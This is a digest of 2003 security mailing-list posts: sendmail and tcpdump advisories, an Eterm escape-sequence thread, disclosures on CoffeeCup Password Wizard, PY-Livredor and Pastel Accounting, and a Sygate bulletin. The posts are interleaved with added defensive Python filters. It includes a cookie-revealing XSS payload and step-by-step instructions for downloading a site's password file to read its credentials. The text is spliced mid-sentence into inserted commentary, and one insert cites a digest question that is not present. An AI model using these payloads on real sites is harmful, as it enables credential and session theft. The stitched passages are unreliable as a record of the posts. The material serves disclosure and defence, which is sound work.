        Fix ETRN #queuegroup command: actually start a queue run for the
                selected queue group.  Problem noted by Jos Vos.
        If MaxMimeHeaderLength is set and a malformed MIME header is fixed,
                log the fixup as "Fixed MIME header" instead of "Truncated
                MIME header".  Problem noted by Ian J Hart.
        CONFIG: Fix regression bug in proto.m4 that caused a bogus error
                message: FEATURE() should be before MAILER().
        MAIL.LOCAL: Be more explicit in some error cases, i.e., whether a
                mailbox has more than one link or whether it is not a
                regular file.  Patch from John Beck of Sun Microsystems.

Instructions to extract and apply patch for sendmail 8.12:

The data below is a uuencoded, gzip'ed tar file. Store the data between the
"begin patch" and "end patch" marker lines into a file called patch.sm and
apply the following command:

  uudecode -p patch.sm | gunzip -c | tar -xf -

This will give you two files:

  sendmail.8.12.security.cr.patch
  sendmail.8.12.security.cr.patch.sig

Check the integrity of the patch file using
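Florian Weimer's question earlier in this digest (filter rules for other MTAs to block offending messages on relays) and the 8.12.8 release note above (the fix drops sender and recipient header comments if they are too long) both point at the same relay-side check: measure the parenthesized comments in address headers. The following is an added example, not sendmail's code or its patch: it extracts comments from an address header value (nested comments and backslash escapes as RFC 2822 allows; a '(' inside a quoted string is not a comment) and flags any sender or recipient header whose longest comment exceeds a threshold. The 256-character threshold and both sample messages are assumptions for illustration, not values from the announcement.

```python
import re

# Header names that carry addresses (sender and recipient fields).
ADDRESS_HEADERS = {
    "from", "sender", "reply-to", "to", "cc", "bcc",
    "resent-from", "resent-sender", "resent-to", "resent-cc", "resent-bcc",
}
MAX_COMMENT_LEN = 256   # assumed policy threshold for this example


def address_comments(value: str) -> list:
    """Return the top-level parenthesized comments in an address header value."""
    comments, buf, depth, in_quote, i = [], [], 0, False, 0
    while i < len(value):
        ch = value[i]
        if ch == "\\" and i + 1 < len(value):   # quoted-pair: next char is literal
            if depth:
                buf.append(value[i + 1])
            i += 2
            continue
        if in_quote:                              # inside "...": parens are not special
            if ch == '"':
                in_quote = False
        elif depth == 0 and ch == '"':
            in_quote = True
        elif ch == "(":
            if depth:
                buf.append(ch)
            depth += 1
        elif ch == ")" and depth:
            depth -= 1
            if depth == 0:
                comments.append("".join(buf))
                buf = []
            else:
                buf.append(ch)
        elif depth:
            buf.append(ch)
        i += 1
    return comments


def longest_comment(value: str) -> int:
    return max((len(c) for c in address_comments(value)), default=0)


def flag_long_comment_headers(raw_message: str, limit: int = MAX_COMMENT_LEN) -> list:
    """Names of address headers whose longest comment exceeds `limit`.
    Folded header lines are joined before parsing."""
    head = raw_message.split("\n\n", 1)[0]
    unfolded = re.sub(r"\r?\n[ \t]+", " ", head)
    flagged = []
    for line in unfolded.split("\n"):
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() in ADDRESS_HEADERS and longest_comment(value) > limit:
            flagged.append(name.strip())
    return flagged


# Constructed sample messages (not captures).
NORMAL_MESSAGE = (
    "From: \"Bob (sales)\" <bob@example.com> (Bob's desk)\n"
    "To: alice@example.com\n"
    "  (Alice, folded onto a second line)\n"
    "Subject: hello\n\n"
    "body\n"
)
OVERLONG_MESSAGE = (
    "From: bob@example.com (" + "x" * 300 + ")\n"
    "To: alice@example.com\n"
    "Subject: hello\n\n"
    "body\n"
)

if __name__ == "__main__":
    print("normal  :", flag_long_comment_headers(NORMAL_MESSAGE))
    print("overlong:", flag_long_comment_headers(OVERLONG_MESSAGE))
```

On a relay this belongs in front of the vulnerable MTA, rejecting or quarantining flagged messages; it reduces exposure for hosts that cannot be upgraded immediately but is no substitute for the 8.12.8 fix, since it only models the one symptom named in the release note.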
Cobalt RaQ server appliances
Hi, does anybody know a security contact at Sun, especially for the Cobalt RaQ server appliances? Thanks, Florian
RE: Terminal Emulator Security Issues
> After further investigation, I'd like to point out the following:
>
> Eterm has *never* allowed any control characters in its title/icon name
> sequences. The following bit of code has existed at least since Eterm
> was first committed to CVS:
>
>     else if (ch < ' ') return;   /* control character - exit */
>
> in term.c::process_xterm_seq(), line 1270 or so.
>
> So there was never any way to get escape sequences in the title to
> begin with, meaning that the command cannot be hidden using any
> character attributes or background/foreground color matching.

What about the CSI character, code 155 (128+27), which DEC terminals (from
at least vt220) interpret as a shorthand for ESC [?

http://vt100.net/docs/vt220-rm/chapter2.html#S2.5.2

Later,
Kenn
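The two Eterm messages in this digest turn on one comparison: the quoted check rejects a character only when it is below ' ', which covers the C0 controls (ESC included) but says nothing about the 8-bit C1 range Kenn asks about, where 0x9B is CSI (the one-byte form of ESC [) and 0x9D is OSC. The following is an added example, not Eterm's code: it models the quoted C0-only test next to a stricter filter that also rejects DEL and C1, and a sanitizer that strips all of them before text reaches a title/icon-name sequence. The samples are constructed; whether a raw 0x9B byte is interpreted as C1 CSI depends on the emulator's character-set mode, so the filter treats it as hostile regardless.

```python
C0_MAX = 0x1F                  # 0x00-0x1F: C0 controls (ESC is 0x1B)
DEL = 0x7F
C1_MIN, C1_MAX = 0x80, 0x9F    # C1 controls: 0x9B = CSI, 0x9D = OSC, 0x9C = ST
TITLE_MAX = 1023               # Eterm caps titles just under 1024 characters


def c0_only_check(text: str) -> bool:
    """Model of the quoted Eterm test: accept unless a character is below ' '."""
    return all(ord(ch) >= 0x20 for ch in text)


def is_control(cp: int) -> bool:
    """True for C0, DEL and C1 code points."""
    return cp <= C0_MAX or cp == DEL or C1_MIN <= cp <= C1_MAX


def strict_check(text: str) -> bool:
    """Accept only text with no C0, DEL or C1 control characters."""
    return not any(is_control(ord(ch)) for ch in text)


def sanitize_title(text: str, max_len: int = TITLE_MAX) -> str:
    """Drop every control character, then truncate to the title length cap."""
    return "".join(ch for ch in text if not is_control(ord(ch)))[:max_len]


def audit(text: str) -> dict:
    """Compare both checks on one input and list the offending code points."""
    bad = sorted({ord(ch) for ch in text if is_control(ord(ch))})
    return {
        "c0_only_accepts": c0_only_check(text),
        "strict_accepts": strict_check(text),
        "controls": [f"0x{cp:02x}" for cp in bad],
        "sanitized": sanitize_title(text),
    }


# Constructed samples (not captures from the thread).
SAMPLES = {
    "plain":   "build: all tests passed",
    "esc_osc": "\x1b]0;title\x07",        # 7-bit OSC: ESC ] ... BEL, caught by both checks
    "c1_csi":  "\x9b31mred\x9b0m",        # 8-bit CSI: passes the C0-only check
    "c1_osc":  "\x9d0;title\x9c",         # 8-bit OSC ... ST: passes the C0-only check
}

if __name__ == "__main__":
    for name, sample in SAMPLES.items():
        print(name, audit(sample))
```

The audit output makes the gap concrete: the C1 samples are accepted by the C0-only model and rejected by the strict one. A filter placed at the point where untrusted text is fed into the title should use the strict form, and the same reasoning applies to any other sequence whose argument an emulator will later echo back to the application.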
Re: Easy obtaining User+Pass+More on CoffeeCup Password Wizard All Versions
The Java version is also vulnerable. The username, password and secret URL
can be extracted from the param 0 in the HTML code. I wrote a small program
for this purpose a couple of months ago.

Password Wizard Java sample: http://www.coffeecup.com/java-password/samples/

  <applet code="joylock.class" width="342" height="140">
  <param name="GENERATOR" value="CREATED WITH THE APPLET PASSWORD WIZARD WWW.COFFEECUP.COM">
  <param name="GENERAL" value="1|11|004080|FF|wslzebajkcnrvogpquftxhidmyvttp://aaa.jnsseejrp.jny/ywxxce.vtyc| |Login Complete.|Enter the Username and Password.| | |">
  <param name="0" value="6|4|36|0|cftzmapuxnrsjibgwykqvleodhlfegvwcwlczccg://qqq.axbbwwahg.axe/enyyvw.zcev">
  </applet>

Best regards,
Per-Ola Kristiansson

----- Original Message -----
From: Rynho Zeros Web [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Saturday, March 01, 2003 12:42 AM
Subject: Easy obtaining User+Pass+More on CoffeeCup Password Wizard All Versions

> + Topic: Easy obtaining User+Pass+More on CoffeeCup Password Wizard All Versions
> + Product: CoffeeCup Password Wizard All Versions
> + Vendor: CoffeeCup Software, Inc.
> + Site: http://www.coffeecup.com/java-password/
>
> + About CoffeeCup Password Wizard:
> Create unlimited password protected pages with unlimited usernames and
> passwords with CoffeeCup Password Wizard. You don't even have to know
> Flash, Java, or HTML ! Customize the look and feel to match your page.
> You can even point different users to different URLs ! Preview within
> the program or your favorite browser. It's all that easy ! All this and
> more make CoffeeCup Password Wizard the easiest way to password protect
> your pages ! (¿?)
>
> + Description:
> Easy obtaining of user names, passwords and a URL of direct access to
> the preferences of the same.
>
> + Exploit:
> Go to the login panel and look in the HTML source code for the location
> of the .swf file used to make the login.
>
> Example: Go to https://www.victim.com/billing/
> See the source code,
>
> [...]
> ID=billing WIDTH=146 HEIGHT=125>
> <PARAM NAME="movie" VALUE="billing.swf">
> <PARAM NAME="quality" VALUE="high">
> [...]
>
> (https://www.victim.com/billing/billing.swf)
>
> The password file is named just like the login file, but with the
> extension .apw. Now, go to download the file:
>
> https://www.victim.com/billing/billing.apw
>
> (APW is the CoffeeCup Password Wizard file)
>
> Finally, open this file with any text editor and you will find all the
> users with their passwords and the URL of direct access to their options.
>
> Example of password file:
>
> ----- billing.apw -----
> COFFEECUP PASSWORD WIZARD FILE
> WWW.COFFEECUP.COM
> PLEASE DO NOT EDIT
> MOVIE WIDTH:120
> MOVIE HEIGHT:100
> MOVIE FRAME RATE:0
> MOVIE BK COLOR:$00ECECEC
> MOVIE DEFAULT URL:
> MOVIE DEFAULT FRAME:
> MOVIE SWF NAME:billing.swf
> MOVIE SWF PATH:C:\Documents and Settings\vhost\Mis documentos\Mis Webs\victim.com\new website project\billing\
> MOVIE FONT NAME:MS Sans Serif
> MOVIE FONT SIZE:8
> MOVIE FONT COLOR:clBlack
> MOVIE TRANSPARENT TRUE
> MOVIE VERTICAL TRUE
> USER BOX LEFT:2
> USER BOX TOP:1
> USER BOX WIDTH:116
> USER BOX HEIGHT:34
> USER BOX CAPTION:Username
> PASS BOX LEFT:2
> PASS BOX TOP:36
> PASS BOX WIDTH:116
> PASS BOX HEIGHT:34
> PASS BOX CAPTION:Password
> BUTTON LEFT:15
> BUTTON TOP:78
> BUTTON WIDTH:90
> BUTTON HEIGHT:20
> BUTTON PATH:
> BUTTON TX:1
> BUTTON TY:1
> ADD USER:0anyweb xnet0305 https://www.victim.com/billing/anyweb0001.htm
> ADD USER:0anysite xnet2904 https://www.victim.com/billing/anysite0002.htm
> [...]
> END
> ----- billing.apw -----
>
> Example of user/pass on billing:
>
> user: anyweb
> pass: xnet0305
> url option panel: https://www.victim.com/billing/anyweb0001.htm
>
> [EOF]
>
> ---
> Credits: ToOcOoL (http://www.valenciahack.com/)
> ---
> Note: sorry for my bad English ;)
>
> --
> XyBØrG
> WebMaster of: www.RZWEB.com.ar
> Powered By Dattatec.Com

passwiz.c
Description: Binary data
[SCSA-008] Cross Site Scripting Script Injection Vulnerability in PY-Livredor
Security Corporation Security Advisory [SCSA-008]

PROGRAM: PY-Livredor
HOMEPAGE: http://www.py-scripts.com http://www.scripts-php.com
VULNERABLE VERSIONS: v1.0

DESCRIPTION

PY-Livredor is an easy guestbook script using Php4 and MySql with an administration which allows message deletion.

DETAILS

A Cross-Site Scripting vulnerability has been found in PY-Livredor which allows attackers to inject script code into the guestbook and run it in the clients' browsers as if it were provided by the website. This Cross-Site Scripting vulnerability is found in the page for posting messages (index.php). An attacker can input specially crafted links and/or other malicious scripts.

EXPLOIT

A vulnerability was discovered in the page for posting messages, at this address: http://[target]/livredor/index.php

The vulnerability is at the level of the interpretation of the titre, Votre pseudo, Votre e-mail and Votre message fields. Indeed, the insertion of a hostile script in one of these fields makes it possible for a malicious user to run that script in the browser of the visitors. The hostile code could be:

[script]alert("Cookie="+document.cookie)[/script]

(opens a window with the cookie of the visitor; replace [] by <>)

SOLUTIONS

No solution for the moment.

VENDOR STATUS

The vendor has reportedly been notified.

LINKS

http://www.security-corp.org/index.php?ink=4-15-1
French version: http://www.security-corp.org/advisories/SCSA-008-FR.txt

Grégory Le Bras aka GaLiaRePt | http://www.Security-Corp.org
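As an added illustration (not code from PY-Livredor or from the advisory), here is the defect class described above next to its fix, written in Python rather than the script's PHP: the vulnerable renderer reflects the four guestbook fields verbatim, the safe one escapes every field for the context it lands in (PHP's htmlspecialchars with ENT_QUOTES is the equivalent call) and only emits the e-mail address inside a link when it matches a conservative pattern. The field names follow the advisory; the markup, the e-mail check and the sample payload are constructed for this example.

```python
import html
import re
from dataclasses import dataclass

# Conservative address shape; anything else is shown as plain text, never as a link target.
_EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")


@dataclass
class GuestbookEntry:
    """The four user-supplied fields named in the advisory (constructed model)."""
    titre: str
    pseudo: str
    email: str
    message: str


def render_vulnerable(e: GuestbookEntry) -> str:
    """Reflects every field into the page untouched: the pattern the advisory reports."""
    return (f"<h3>{e.titre}</h3>"
            f'<p>par <a href="mailto:{e.email}">{e.pseudo}</a></p>'
            f"<p>{e.message}</p>")


def render_safe(e: GuestbookEntry) -> str:
    """Escapes each field for its output context.

    html.escape(quote=True) turns < > & " ' into entities, so text cannot close a tag
    and an attribute value cannot close its quotes. The e-mail goes into an href only
    when it looks like an address; a crafted value is dropped rather than escaped.
    """
    esc = lambda s: html.escape(s, quote=True)
    author = esc(e.pseudo)
    if _EMAIL_RE.match(e.email):
        author = f'<a href="mailto:{esc(e.email)}">{author}</a>'
    return f"<h3>{esc(e.titre)}</h3><p>par {author}</p><p>{esc(e.message)}</p>"


def contains_active_content(fragment: str) -> bool:
    """Cheap detector a reviewer can run over stored entries or rendered pages."""
    low = fragment.lower()
    return "<script" in low or "onerror=" in low or "javascript:" in low


# Constructed sample input: the advisory's payload placed in the title field.
SAMPLE_PAYLOAD = '<script>alert("Cookie="+document.cookie)</script>'
SAMPLE_ENTRY = GuestbookEntry(titre=SAMPLE_PAYLOAD, pseudo="visiteur",
                              email="visiteur@example.net", message="Bonjour")
```

Running contains_active_content over both renderings of SAMPLE_ENTRY shows the difference: the vulnerable output still carries a live script element, the safe output carries only entity text.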
MDKSA-2003:027 - Updated tcpdump packages fix denial of service vulnerabilities
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Mandrake Linux Security Update Advisory

Package name: tcpdump
Advisory ID: MDKSA-2003:027
Date: March 3rd, 2003
Affected versions: 8.1, 8.2, 9.0, Corporate Server 2.1, Multi Network Firewall 8.2, Single Network Firewall 7.2

Problem Description:

A vulnerability was discovered by Andrew Griffiths and iDEFENSE Labs in the tcpdump program. By sending a specially crafted network packet, an attacker is able to cause tcpdump to enter an infinite loop. In addition, the tcpdump developers found a potential infinite loop when tcpdump parses malformed BGP packets. A buffer overflow was also discovered that can be exploited with certain malformed NFS packets.

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0108

Updated Packages:

Corporate Server 2.1:
9df719dae2bffe49798156e87e875301 corporate/2.1/RPMS/libpcap0-0.7.2-1.1mdk.i586.rpm
fa7813f3afb1df4b3c00b73a198a53db corporate/2.1/RPMS/libpcap0-devel-0.7.2-1.1mdk.i586.rpm
b32457602c61c0febcfc2e511373b517 corporate/2.1/RPMS/tcpdump-3.7.2-1.1mdk.i586.rpm
2a5ba8809cc1b919e14eda315a6340b7 corporate/2.1/SRPMS/libpcap-0.7.2-1.1mdk.src.rpm
5129421a6ff6b84a4e4faae0119cfb23 corporate/2.1/SRPMS/tcpdump-3.7.2-1.1mdk.src.rpm

Mandrake Linux 8.1:
785f18da90ecf009c38d8e9e01216756 8.1/RPMS/libpcap0-0.7.2-1.1mdk.i586.rpm
512599ad54b47f70f54d722e7618ac45 8.1/RPMS/libpcap0-devel-0.7.2-1.1mdk.i586.rpm
01ab2770370dd94c1946b476df624fb7 8.1/RPMS/tcpdump-3.7.2-1.1mdk.i586.rpm
2a5ba8809cc1b919e14eda315a6340b7 8.1/SRPMS/libpcap-0.7.2-1.1mdk.src.rpm
5129421a6ff6b84a4e4faae0119cfb23 8.1/SRPMS/tcpdump-3.7.2-1.1mdk.src.rpm

Mandrake Linux 8.1/IA64:
b6de1971e7852f1f1255dcf237af3cde ia64/8.1/RPMS/libpcap0-0.7.2-1.1mdk.ia64.rpm
de264fee1447af71141926878c93512e ia64/8.1/RPMS/libpcap0-devel-0.7.2-1.1mdk.ia64.rpm
7dc035a9f8e8c14d80b27517ea52597f ia64/8.1/RPMS/tcpdump-3.7.2-1.1mdk.ia64.rpm
2a5ba8809cc1b919e14eda315a6340b7 ia64/8.1/SRPMS/libpcap-0.7.2-1.1mdk.src.rpm
5129421a6ff6b84a4e4faae0119cfb23 ia64/8.1/SRPMS/tcpdump-3.7.2-1.1mdk.src.rpm

Mandrake Linux 8.2:
a86ae9c1f7d281382daf0a748b0cc192 8.2/RPMS/libpcap0-0.7.2-1.1mdk.i586.rpm
24fe4d16b5e81d825fa6648a84997d84 8.2/RPMS/libpcap0-devel-0.7.2-1.1mdk.i586.rpm
84e2ee00e25cb8e54d6efd98e20bd036 8.2/RPMS/tcpdump-3.7.2-1.1mdk.i586.rpm
2a5ba8809cc1b919e14eda315a6340b7 8.2/SRPMS/libpcap-0.7.2-1.1mdk.src.rpm
5129421a6ff6b84a4e4faae0119cfb23 8.2/SRPMS/tcpdump-3.7.2-1.1mdk.src.rpm

Mandrake Linux 8.2/PPC:
843c2d96494d413e96dee63c6eb013c8 ppc/8.2/RPMS/libpcap0-0.7.2-1.1mdk.ppc.rpm
112ca43b4c261593d5667dc44c17c700 ppc/8.2/RPMS/libpcap0-devel-0.7.2-1.1mdk.ppc.rpm
635d8576811efaee84d2c3608752669d ppc/8.2/RPMS/tcpdump-3.7.2-1.1mdk.ppc.rpm
2a5ba8809cc1b919e14eda315a6340b7 ppc/8.2/SRPMS/libpcap-0.7.2-1.1mdk.src.rpm
5129421a6ff6b84a4e4faae0119cfb23 ppc/8.2/SRPMS/tcpdump-3.7.2-1.1mdk.src.rpm

Mandrake Linux 9.0:
9df719dae2bffe49798156e87e875301 9.0/RPMS/libpcap0-0.7.2-1.1mdk.i586.rpm
fa7813f3afb1df4b3c00b73a198a53db 9.0/RPMS/libpcap0-devel-0.7.2-1.1mdk.i586.rpm
b32457602c61c0febcfc2e511373b517 9.0/RPMS/tcpdump-3.7.2-1.1mdk.i586.rpm
2a5ba8809cc1b919e14eda315a6340b7 9.0/SRPMS/libpcap-0.7.2-1.1mdk.src.rpm
5129421a6ff6b84a4e4faae0119cfb23 9.0/SRPMS/tcpdump-3.7.2-1.1mdk.src.rpm

Multi Network Firewall 8.2:
a86ae9c1f7d281382daf0a748b0cc192 mnf8.2/RPMS/libpcap0-0.7.2-1.1mdk.i586.rpm
24fe4d16b5e81d825fa6648a84997d84 mnf8.2/RPMS/libpcap0-devel-0.7.2-1.1mdk.i586.rpm
84e2ee00e25cb8e54d6efd98e20bd036 mnf8.2/RPMS/tcpdump-3.7.2-1.1mdk.i586.rpm
2a5ba8809cc1b919e14eda315a6340b7 mnf8.2/SRPMS/libpcap-0.7.2-1.1mdk.src.rpm
5129421a6ff6b84a4e4faae0119cfb23 mnf8.2/SRPMS/tcpdump-3.7.2-1.1mdk.src.rpm

Single Network Firewall 7.2:
ea11a1e2673e0f2da584f08c83ac86a7 snf7.2/RPMS/libpcap-0.7.2-0.1mdk.i586.rpm
972bdf436bdece0078fafcddcaee7c85 snf7.2/RPMS/libpcap-devel-0.7.2-0.1mdk.i586.rpm
c96c4ae08580e72334da63a306168c41 snf7.2/RPMS/tcpdump-3.7.2-0.1mdk.i586.rpm
971d86767061c5804ddb3cf7de5ab167 snf7.2/SRPMS/libpcap-0.7.2-0.1mdk.src.rpm
9fb87d3952bf381e5ad552d16baea15b snf7.2/SRPMS/tcpdump-3.7.2-0.1mdk.src.rpm

Bug IDs fixed (see https://qa.mandrakesoft.com for more information):

To upgrade automatically, use MandrakeUpdate. The verification of md5 checksums and GPG signatures is performed automatically for you. If
Re: Cobalt RaQ server appliances
On Mon, Mar 03, 2003 at 06:26:20PM +0100, Florian Effenberger wrote:
> does anybody know a security contact at Sun, especially for the Cobalt RaQ server appliances?

[EMAIL PROTECTED] is the best place to contact for any and all Sun security issues. For sensitive information, their PGP key is available at http://sunsolve.sun.com/pub-cgi/show.pl?target=security/sec

Alan Coopersmith [EMAIL PROTECTED] http://www.CSUA.Berkeley.EDU/~alanc/
aka: [EMAIL PROTECTED]
Working for, but definitely not speaking for, Sun Microsystems, Inc.
[blaqhatz] - Pastel Accounting application security issues
See attached.

-BEGIN PPP SIGNED MESSAGE-
Hash: SH1T

--blaqhatz-ph33r-blaqhatz-ph33r-blaqhatz-ph33r-blaqhatz-ph33r-blaqhatz--
[EMAIL PROTECTED]@[EMAIL PROTECTED] ADVISORY [EMAIL PROTECTED]@[EMAIL PROTECTED]

blaqhatz advisory #1
date: third day of march, in the year of our lord two thousand and three (03/03/03)
why today? coz we love 303, oh! oh! oh!
http://www.only4jewz.net/efil4zaggin/blaqhatz.advisory.20030303

[ASCII-art "blaqhatz" banner not reproduced]

PRODUCT: PASTEL ACCOUNTING v6.0-6.12 (confirmed), earlier versions (suspected)

1. BACKGROUND

Pastel Accounting is an accounting package widely used by small business entities in countries in Africa, Europe, the Middle and Far East and Australasia. The Pastel product includes a facility for secure access to specific modules within the product. Further information is available @ http://www.pastel.com

2. PROBLEM DESCRIPTION

The security system and application controls used by the Pastel product are broken. All user and security information is stored within the file ACCUSER.DAT within the chosen client folder. No data is encrypted with any information within this file, nor is any version/validity checking done against this file. As such, it is possible to replace the ACCUSER.DAT file with one from a different set of accounts, with known usernames and passwords, access and modify the data stored within a specific set of accounts and then restore the original file, thus providing no concrete on by whom the files were modified. In some contexts, it would even be possible to falsify records in an attempt to 'frame' a particular user with changes.

Additionally, some preliminary testing on the accuser.dat file displayed an alarming correlation between certain sections of the file and the passwords chosen. For example, given a group of users with chosen passwords , , , , and ABCDEFGH, the following strings were found in the file: , , , , and stuvwxyz.

3. IMPACT

Users may not rely on the application level controls implemented by the Pastel Accounting package. As no reliance may be placed on application level controls, auditors must audit around the application.

4. FIX

None as of yet. Vendor notified.

5. WHO ARE BLAQHATZ?

blaqhatz are: pheer - pheerless - skankyvontrashbag - skankette - nyama_zinto - rod-boi - pheered - minibyte - whoot - pofmuis

--blaqhatz-ph33r-blaqhatz-ph33r-blaqhatz-ph33r-blaqhatz-ph33r-blaqhatz--

[EMAIL PROTECTED] blaqhatz [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] telling us who and what you are and with a good reason as to why you think you're leet enough to join blaqhatz

Why should I join?

1. Everyone else thinks blaqhatz 0wn.
2. blaqhatz have been interviewed by more international legal authorities, seen the inside of more networks and more telco's, been on more television shows, been asked to assist more national intelligence agencies and skewled more people than any other group. **blaqhatz are *the* authority on modern information security**
3. We're nice people.
4. You can get sekret, blaqhatz warez, for free, just for applying.
5. You value security and 0day. You believe in freedom of information. You believe in helping others help themselves. blaqhatz will help you act to make your beliefs a reality.
6. We're only accepting new member applications until the 9th of the 3rd, 2000 3, on a first come, first served basis. All members will need to be approved by the elite blaqhatz board.

Big ups, shout outs and serious ruspek go to: ~el8, BoW, #havok, phrack.org, kouriers 4 christ, #hack krew, oldskewl efnet #phreakGER, effkay, arclight, maelstrom, ganja_man, scavenger, mindbinder, raw liquid, tonedef, y0y0y0 and c0.

r0qin' 1t iN [EMAIL PROTECTED
Sygate Security Bulletin SS20030221-0001
On 2/21/2003 Sygate posted a Security Response to vuln-dev in response to an advisory posted by Oliver Lavery (xenophi1e) oliver.lavery at sympatico dot com. When first responding to the advisory, it was believed that the vulnerability was reporting that the Sygate Personal Firewall process itself was vulnerable to evasion through the use of CreateRemoteThread(). Sygate Security Bulletin SS20030221-0001 described protections that are in place to prevent this type of evasion in the Sygate Personal Firewall process itself.

After re-examining the vulnerability report and working with the reporter of this vulnerability, Oliver Lavery, it was determined that the report discussed the insertion of code into the address space of other applications. The vulnerability advisory highlights the issue that a firewall restricting network access on a per-application basis does not protect against many types of application behavior, particularly those relating to how the application interacts with the operating system.

Sygate Personal Firewall determines which applications are authorized to send and receive traffic based on MD5 hashes (also called fingerprints) of the executables, the .DLLs used by the application and the associated firewall rules. If a malicious program executes code within the address space of an authorized application, that traffic will be allowed by the personal firewall. The scope of the filtering technology within Sygate Personal Firewall does not include monitoring the address space of a given process. The restriction of system and API calls in third-party applications is currently outside of the scope of the network-based functionality of Sygate Personal Firewall.

Sygate Personal Firewall employs a variety of technologies to protect a computer, including trojan and network intrusion prevention to provide several layers of network-based protection. Sygate is developing new technologies and will continue to work towards providing the most comprehensive security solutions for our customers.

Elisha Riedlinger
Product Manager
Sygate Technologies, Inc.
SuSE Security Announcement: sendmail (SuSE-SA:2003:013)
-BEGIN PGP SIGNED MESSAGE-

SuSE Security Announcement

Package: sendmail, sendmail-tls
Announcement-ID: SuSE-SA:2003:013
Date: Monday, March 3rd 2003, 18:10 MET
Affected products: 7.1, 7.2, 7.3, 8.0, 8.1
    SuSE Linux Database Server,
    SuSE Linux Enterprise Server 7, 8
    SuSE Linux Firewall on CD/Admin host
    SuSE Linux Connectivity Server
    SuSE Linux Office Server
Vulnerability Type: local privilege escalation
Severity (1-10): 7
SuSE default package: yes (until SuSE Linux 8.0 and SLES7)
Cross References: http://www.cert.org/advisories/CA-2003-07.html

Content of this advisory:
1) security vulnerability resolved: sendmail
   problem description, discussion, solution and upgrade information
2) pending vulnerabilities, solutions, workarounds:
   - vnc
   - w3m
3) standard appendix (further information)

1) problem description, brief discussion, solution, upgrade information

sendmail is the most widely used mail transport agent (MTA) in the internet. A remotely exploitable buffer overflow has been found in all versions of sendmail that come with SuSE products. These versions include sendmail-8.11 and sendmail-8.12 releases. sendmail is the MTA subsystem that is installed by default on all SuSE products up to and including SuSE Linux 8.0 and the SuSE Linux Enterprise Server 7.

The vulnerability is triggered by an email message sent through the sendmail MTA subsystem. In that respect, it is different from commonly known bugs that occur in the context of an open TCP connection. By consequence, the vulnerability also exists if email messages get forwarded over a relay that itself does not run a vulnerable MTA. This specific detail and the wide distribution of sendmail in the internet causes this vulnerability to be considered an error of major severity.

The buffer overflow happens on the heap and is known to be exploitable. As of the writing of this announcement, there is no exploit known to exist in the public.

Since there is no known workaround for this vulnerability other than using a different MTA, it is strongly recommended to install the update packages as offered at the locations as listed below.

We would like to express our gratitude to Eric Allman for notifying SuSE Security of the problem. The vulnerability was discovered by ISS Internet Security Systems, inc.

Please download the update package for your distribution and verify its integrity by the methods listed in section 3) of this announcement. Then, install the package using the command

rpm -Fhv file.rpm

to apply the update. Our maintenance customers are being notified individually. The packages are being offered to install from the maintenance web.

SPECIAL INSTALL INSTRUCTIONS:
=============================
After performing the update, it is necessary to restart all running instances of sendmail using the command

rcsendmail restart

as root.

Intel i386 Platform:

SuSE-8.1:
ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/sendmail-8.12.6-91.i586.rpm
0f3d981ad8e9be64bc70aff474ce303c
ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/sendmail-devel-8.12.6-91.i586.rpm
afe98a29de75ecd362fad5b02a922856
patch rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/sendmail-8.12.6-91.i586.patch.rpm
ebd8f188748812aff2830b23de6f34b3
ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/sendmail-devel-8.12.6-91.i586.patch.rpm
09ff6834c369051d165d78f01a44d684
source rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/sendmail-8.12.6-91.src.rpm
50e471df3a90ce4b54b2c5ca3fbc081e

SuSE-8.0:
ftp://ftp.suse.com/pub/suse/i386/update/8.0/n1/sendmail-8.12.3-72.i386.rpm
09e0a8ed5b189c7c819d3d38f74a07e1
ftp://ftp.suse.com/pub/suse/i386/update/8.0/d4/sendmail-devel-8.12.3-72.i386.rpm
72a8c31090299df6b7bd52ea38c31c2b
patch rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/8.0/n1/sendmail-8.12.3-72.i386.patch.rpm
905b39525ecd0506892b442a204b7aa3
ftp://ftp.suse.com/pub/suse/i386/update/8.0/d4/sendmail-devel-8.12.3-72.i386.patch.rpm
a03e4a221c1fb8f2387dc133ada9e604
source rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/sendmail-8.12.3-72.src.rpm
6e3106de72c4605d379dc2133adba97b

SuSE-7.3:
ftp://ftp.suse.com/pub/suse/i386/update/7.3/n1/sendmail-8.11.6-162.i386.rpm
Re: Terminal Emulator Security Issues
On Monday, 03 March 2003, at 17:43:28 (-), Kenn Humborg wrote:
> What about the CSI character, code 155 (128+27), which DEC terminals (from at least vt220) interpret as a shorthand for ESC [?

Eterm is a vt102 emulator, not a vt220 emulator. It does not support the 8-bit version of the CSI. You can test this using:

echo -e "\23321t"

You'll get that exact same string in response. It may be supported at some point in the future, however, in which case it would be considered a control character just like any other.

Michael

--
Michael Jennings (a.k.a. KainX) http://www.kainx.org/ [EMAIL PROTECTED]
n + 1, Inc., http://www.nplus1.net/
Author, Eterm (www.eterm.org)
---
Three six nine, the goose drank wine; the monkey chewed tobacco on the street car line. The line broke, the monkey got choked, and they all went to heaven in a little row boat. -- Nursery Rhyme
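The exchange above turns on whether byte 155 (0x9b) is a control character. For a program that has to print untrusted data to a terminal (a log viewer, a script echoing file names or mail headers), the safe assumption is the one Michael mentions for the future: treat the 8-bit C1 range like ESC. The following filter is an added example, not code from Eterm or from either poster; the function and constant names are constructed. It neutralizes C0 controls, DEL and C1 controls (0x80 to 0x9f, which includes CSI 0x9b and OSC 0x9d), and it handles the edge case that makes naive byte filters break text: in UTF-8, bytes in 0x80 to 0x9f also occur as continuation bytes of ordinary characters, so valid UTF-8 is filtered on code points and only undecodable 8-bit data is filtered byte by byte.

```python
import re

# Ranges a terminal may act on: C0 controls (except TAB, LF, CR), DEL, and the C1
# range 0x80-0x9f, which holds the 8-bit CSI (0x9b) and OSC (0x9d) that vt220-class
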